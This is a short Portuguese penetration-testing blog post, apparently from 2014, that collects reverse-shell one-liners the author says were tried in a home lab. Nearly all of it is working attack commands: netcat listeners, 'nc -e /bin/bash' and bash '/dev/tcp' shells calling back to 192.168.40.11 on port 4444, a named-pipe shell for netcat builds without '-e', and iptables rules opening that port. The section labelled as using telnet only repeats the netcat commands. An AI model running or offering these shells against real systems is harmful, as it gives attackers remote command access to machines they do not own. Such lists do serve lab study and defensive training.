– root@injetionsec:~#

ferramentas – linux shell

26.12.2014 (4:23 pm) – Filed under: Pentest ::

galera segue alguns comandos que achei interessante abordar, aprendi realizando alguns testes no lab controlado que tenho por aqui, são simples mas de extrema importância.

– reverse shell

root@bt:~# nc -lvp 4444
root@bt:~# nc -vvz 192.168.40.11 4444 -e /bin/bash

OU

root@bt:~# nc -n -vv -l -p 4444
root@bt:~# /bin/bash –i >/dev/tcp/192.168.40.11/4444 0<&1 2>&1

– netcat (GAPING_SECURITY_HOLE) desabilitado

quando o GAPING_SECURITY_HOLE está desativado você não tem acesso à opção ‘-e’ do netcat pode-se fazer da seguinte forma:

root@bt:~# nc -n -vv -l -p 4444
root@bt:~# mknod file p && nc 192.168.40.11 4444 0<file | /bin/bash 1>file

– sem netcat , usando socket para conectar no host

root@bt:~# sudo /sbin/iptables -I INPUT 1 -p tcp –dport 4444 -j ACCEPT # “connetion refused” to firewall rejecting connection
root@bt:~# /bin/bash -i > /dev/tcp/192.168.40.11/4444 0<&1 2>&1 
root@bt:~# nc -n -vv -l -p 4444

– sem netcat e /dev/tcp “usando telnet”

root@bt:~# sudo /sbin/iptables -I INPUT 1 -p tcp –dport 4444 -j ACCEPT # “connetion refused” to firewall rejecting connection
root@bt:~# nc -n -vv -l -p 4444
root@bt:~# mknod file p && nc 192.168.40.11 4444 0<file | /bin/bash 1>file

até + galera 0/

 

Referência : ebook Hacking by Pankaj | netcat_infrastructure.pdf